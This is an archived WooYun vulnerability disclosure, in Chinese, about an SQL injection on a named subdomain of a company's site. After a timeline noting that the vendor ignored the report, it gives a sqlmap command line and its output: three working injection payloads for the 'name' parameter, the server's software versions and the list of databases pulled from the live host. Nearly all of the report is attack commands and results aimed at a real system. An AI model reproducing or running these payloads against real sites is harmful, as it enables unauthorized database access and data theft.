乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开
赛百威某分站漏洞2
root@jack:~# sqlmap -u http://life.cyberway.net.cn/community?name=a --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program[*] starting at 14:25:28[14:25:28] [INFO] resuming back-end DBMS 'mysql'[14:25:28] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) reque sts:---Place: GETParameter: name Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: name=a' AND (SELECT 7731 FROM(SELECT COUNT(*),CONCAT(0x7167686371,( SELECT (CASE WHEN (7731=7731) THEN 1 ELSE 0 END)),0x716d636671,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JrxR'='JrxR Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: name=a'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: name=a' AND 9806=BENCHMARK(5000000,MD5(0x6171704c)) AND 'SenW'='Sen W---[14:25:28] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.3web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0[14:25:28] [INFO] fetching database names[14:25:28] [INFO] the SQL query used returns 6 entries[14:25:28] [INFO] resumed: information_schema[14:25:28] [INFO] resumed: colorlife[14:25:28] [INFO] resumed: colorlife_2015_02_28[14:25:28] [INFO] resumed: colourlife[14:25:28] [INFO] resumed: mysql[14:25:28] [INFO] resumed: testavailable databases [6]:[*] colorlife[*] colorlife_2015_02_28[*] colourlife[*] information_schema[*] mysql[*] test[14:25:28] [INFO] fetched data logged to text files under '/usr/share/sqlmap/out put/life.cyberway.net.cn'[*] shutting down at 14:25:28
.。
未能联系到厂商或者厂商积极拒绝